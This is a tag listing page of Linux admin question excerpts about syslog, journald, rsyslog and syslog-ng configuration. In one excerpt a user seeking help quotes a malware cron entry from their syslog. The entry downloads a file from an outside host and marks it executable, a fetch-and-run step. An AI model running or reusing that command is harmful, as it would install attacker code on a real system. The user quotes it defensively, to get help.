
Questions tagged [syslog]

syslog is a standard (RFC 5424) for message logging. Use this tag for syslog logging related messages. For generic logging messages use [logging] instead.

2 votes
1 answer
89 views

I have Ubuntu 24.04 servers with this Journald config by default: user@server:~$ systemd-analyze cat-config systemd/journald.conf # /etc/systemd/journald.conf # This file is part of systemd. ... [...
Madoc Comadrin's user avatar
0 votes
0 answers
114 views

I am trying to understand why one of my systems has /dev/log as a socket and the other has /dev/log as a symbolic link. [ec2-user@ip-171-31-12-17 log]$ file /dev/log /dev/log: symbolic link to /run/systemd/...
Boogeyman's user avatar
0 votes
1 answer
67 views

I have tried to log into journald using logger. logger test, journalctl |grep test does not show any output. The message does not reach journald even though it is listening and logger is writing (I ...
maths soso's user avatar
1 vote
1 answer
105 views

Good evening, I am running multiple Cisco routers/switches and a virtualized Debian install. In order to have proper forensic capabilities in case of attack/breach/malfunction I wish to have remote ...
fsardone's user avatar
0 votes
1 answer
56 views

On my actual macOS, there are every day 7 flat files in /var/log of name mail.log* rotating at 23:00: ### 18:20 milky-way:/etc/asl # ls -al /var/log/mail.log* -rw-r-----@ 1 root admin ...
athena's user avatar
  • 1,095
-1 votes
1 answer
471 views

I have a service defined via docker compose (see definition below). When I tried to start this service via docker-compose -f up --wait -d my_service, I get the error Error response from daemon: ...
atl123's user avatar
  • 3
0 votes
1 answer
879 views

I noticed that the default datetime format for logs in /var/log/messages is mmm [d]d hh:mm:ss, for example: Jan 4 03:46:50 1.2.3.4 ntpclient[6952]: Failed resolving address to hostname pool.ntp.org: ...
skeetastax's user avatar
0 votes
2 answers
651 views

I am running syslog-ng on debian. How do I check which conf file was loaded upon startup? Neither systemctl status syslog-ng nor systemctl show syslog-ng tell me.
skeetastax's user avatar
0 votes
1 answer
450 views

I have a log line that looks like this: May 20 10:25:42 192.168.20.100 Timestamp="2024-05-20 10:25:42",LogId="535666280",NodeId="192.168.1.100",Facility="Packet ...
azzid's user avatar
  • 1,020
-1 votes
1 answer
594 views

As far as I can tell, syslogd in its default configuration throws away all log data on reboot. I have observed this data on Raspbian (Debian Linux-based) and on OPNsense (FreeBSD-based). From my point ...
user149408's user avatar
  • 1,565
-1 votes
1 answer
317 views

I am writing a small plugin for Postfix using Python and want it to emit logging messages. I am not particularly familiar with Python and was advised to use loguru. This was certainly easy when I ...
symcbean's user avatar
  • 6,359
0 votes
1 answer
68 views

I've configured rsyslog to forward certain log messages to a named pipe /tmp/logger.pipe. I then have a separate process reading from the named pipe. Relevant section from /etc/rsyslog.conf # Remote ...
Izzo's user avatar
  • 1,023
2 votes
1 answer
786 views

On pfSense, I've enabled Prometheus Node Exporter, but it gives the following log errors each 15 seconds: Feb 15 09:53:57 vault node_exporter[25559]: ts=2024-02-15T08:53:57.164Z caller=collector.go:...
Artur Meinild's user avatar
0 votes
2 answers
543 views

This is occurring while backing up whole drive with rsync. I'm trying to sync two large hard drives as a backup and I'm doing so exactly as described here using the Grsync GUI. While doing so I get ...
mYnDstrEAm's user avatar
  • 4,962
1 vote
0 answers
3k views

TLDR: We use PAM with SSHD. CentOS and Ubuntu exist in the environment. For every SSHD failure of an unknown user, it creates two messages. One of the messages doesn't provide the unknown username and ...
Top-Lunch-7931's user avatar
0 votes
0 answers
960 views

I have been receiving hard disk warnings from the smartd daemon for a while now (every 24 hours), saying that my error logs have increased. I have been trying to examine this by checking my log files, ...
tobibox's user avatar
  • 11
0 votes
1 answer
589 views

I had read that syslog is placed in the /var/log directory. But I can't open it in spite of the directory being included in PATH. lm@debian:~$ echo $PATH /usr/local/bin:/usr/bin:/bin:/usr/local/games:/...
ant's user avatar
  • 27
1 vote
1 answer
5k views

I am new to log rotation and have a syslog server that has been set up to receive firewall logs over 514. Now, the firewall is generating A LOT of data, ~600-800GB/day and the server's capacity is 1TB. ...
phil_sw's user avatar
  • 13
0 votes
1 answer
224 views

The log in syslogs is as follows: [UFW BLOCK] IN=wlan0 OUT= MAC=33:33:00:00:00:01:e8:48:b8:5f:a0:e8:86:dd SRC=fe80:0000:0000:0000:ea48:b8ff:fe5f:a0e8 DST=ff02:0000:0000:0000:0000:0000:0000:0001 LEN=52 ...
Yeh acc's user avatar
0 votes
0 answers
1k views

I am doing a project where the organisation uses syslog-ng for the central remote logging servers and this will surely not change. The application suite that I am developing on, is using Red Hat ...
user581894's user avatar
1 vote
2 answers
864 views

Here we try to break syslog file into smaller chunks. For that we use following script. #!/bin/bash date=$(date +%Y%m%d_%H%M) cp /path/to/sys.log /path/to/chuck/file.log cat /dev/null > /path/to/...
Sachith Muhandiram's user avatar
0 votes
1 answer
377 views

My goal is to send all logs to one source remote and still log local but then send all the AuditD logs to its own source on port 20002. But for some reason, my auditd logs are still ending up with my ...
Jason's user avatar
  • 1,754
2 votes
1 answer
195 views

So, we have several Redhat Enterprise Linux servers for an internal application that we support in our team at the office. Among other things, the servers send "auto-print" reports of ...
Gael L's user avatar
  • 131
0 votes
1 answer
126 views

I have enabled the SFTP login log into the default logfile /var/log/syslog and tried to filter the login time of each user and insert into the database. But the filtering has not worked as I expected. ...
Amal P Ramesh's user avatar
2 votes
1 answer
197 views

I have a Linux machine running Ubuntu 16.04.7 LTS that uses rsyslogd. My understanding of rsyslogd is that it rotates the content from the kernel ring buffer (ie, dmesg) to an on-disk file (ie, /var/...
Ken Lin's user avatar
  • 153
1 vote
0 answers
107 views

I updated busybox to 1.35.0 and had the same settings as earlier but for some reasons the syslogd is not outputting year in the timestamp information. Prior to this I was using busybox 1.19.3 and it ...
m4n07's user avatar
  • 191
1 vote
2 answers
2k views

I work on yocto based linux distribution. I'm not expert about systemd and neither about systemd-journald. My C program my_c_program is started at boot by the script my_script.sh. Below there is the ...
User051209's user avatar
1 vote
1 answer
725 views

Problem: Kernel logs that occurred before syslogd starts up, do not get appended to my syslog. System Description: I have syslogd starting up about 5s into the boot sequence. I have a script that ...
SammyWammy's user avatar
2 votes
1 answer
1k views

For a while looking for a solution that with systemd tools will give me an opportunity to bypass the journal and log directly to syslog. Potentially that can be also filtered, but only on journal not ...
jareeq's user avatar
  • 163
4 votes
3 answers
5k views

I set up my journald to limit the log size to 5GB in /etc/systemd/journald.conf and thought everything was fine. Then, yesterday, I realized that my /var/log/syslog file is in fact 12GB big. What I ...
flood's user avatar
  • 388
1 vote
1 answer
2k views

I'm using the following rsyslog configuration file to redirect logs of a program to a specific file. # Name of the program set $.program_name = "myapp"; # Path to the log file set $....
Arkaik's user avatar
  • 1,198
0 votes
1 answer
115 views

I have a malware which run every minute, i can see it from /var/log/syslog Feb 1 18:30:01 MENCH CRON[1768]: (www-data) CMD (wget -q -O xxxd http://hello.hahaha666.xyz/xxxd && chmod 0755 xxxd &...
Augusto Murri's user avatar
0 votes
2 answers
215 views

Considering the following architecture: I have a laptop connected to a server over ethernet. This laptop is configured to send log events with rsyslog on the server, the server is configured to accept ...
Jaay's user avatar
  • 145
0 votes
1 answer
121 views

How can the auditing feature in an AIX Unix system be configured to collect information about the removal of a directory (though rmdir) and send it to syslog?
Tekkkee's user avatar
1 vote
0 answers
319 views

For example I have the following: pam_unix(sudo:session): session opened for user root(uid=0) by (uid=997) pam_unix(sudo:session): session closed for user root pam_unix(cron:session): session closed ...
Jason's user avatar
  • 1,754
0 votes
1 answer
148 views

I would like to know what process is meant to write timestamps (and other parts of log messages) in the Syslog protocol. In other words, is it Syslog that sets timestamp of log message (exact time of ...
GabrijelOkorn's user avatar
1 vote
0 answers
282 views

I got quite confused reading manual pages of klogd, dmesg and syslog(2). I would like to understand how the message produced by the kernel gets to /var/log/file. First thing I would like to get to ...
GabrijelOkorn's user avatar
2 votes
1 answer
500 views

I have a question about a syslog application. I wrote a simple program using syslog API. I compiled and launched the program. It works, I can see logs on the journal. However, when I reconfigured ...
Lioyerar's user avatar
5 votes
2 answers
14k views

I have a configuration /etc/systemd/[email protected] which contains the setting ForwardToSyslog=yes and a systemd service unit configured with LogNamespace=my-namespace. The documentation ...
Aaron Enberg's user avatar
0 votes
1 answer
467 views

One physical machine had shut down unexpectedly, there is no error log about that, I only get a large ^@ in one line of the /var/log/syslog file such as: Dec 9 21:50:02 hostname CRON[74324]: (root) MAIL (...
VictorLee's user avatar
  • 187
0 votes
1 answer
2k views

I am new to syslog-ng and was trying to fix the issue of an error which arises due to uniqueness of the persist names in syslog-ng, I see the below error in my syslog err Error checking the ...
Manu's user avatar
  • 103
6 votes
1 answer
12k views

I'm trying to search through dozens of logfiles that were not sent to systemd-journald, and would like to filter the results by time, the way journalctl's -S (since) and -U (until) do. Option 1: ...
PFudd's user avatar
  • 203
0 votes
2 answers
716 views

OK, so basically I'm trying to give a specific date and time and I want to see all the logins that were made during the hour range, e.g. last hour or two last hours from the time and date given. I ...
kuska's user avatar
  • 1
1 vote
1 answer
521 views

Regarding the manpage of syslog there are different facilities (e.g. USER). Depending on that facility log messages going into different log files (e.g. /var/log/syslog, /var/log/messages, ...). I ...
buhtz's user avatar
  • 965
1 vote
1 answer
66 views

How do I detect if a particular ssh login was made by running a script or was it a user who typed password? I want to detect script based logins. 'auth.log' doesn't give me this info. Is there any ...
sri's user avatar
  • 11
0 votes
1 answer
335 views

I have a specific PID and my question is how can I know which port belongs to that PID. Any tips on how to know the port of a service that has a specific PID? Thanks a lot.
EuDaKi's user avatar
  • 1
2 votes
0 answers
1k views

I have two systems running NVIDIA jetpack 5.0.2, based on Ubuntu 20.04. /etc and /boot are identical on both systems. On the first system, after boot, if I try to run logger I get an error /dev/log: ...
Jayen's user avatar
  • 211
1 vote
0 answers
317 views

I am a user without sudo on a CentOS 7 system running rsyslog. I would like to log my cronjobs. Ideally, rsyslog would log all my user's cron activity to somewhere like ~/log/cron. There are good ...
Jacktose's user avatar
  • 532
1 vote
1 answer
529 views

I just installed rsyslog on rhel8. So the /etc/rsyslog.conf file is stock. Here's my custom config: /etc/rsyslog.d/10-remote.conf module(load="imudp") ruleset(name="remote_udp"){ ...
itinneed2022_1's user avatar
1 vote
1 answer
2k views

We are using printf till now and the output was coming to stdio. Now we want to remove it from stdio and put in syslog. I have a big code base and so replacing all the printf will not be a good ...
m Rout's user avatar
  • 11
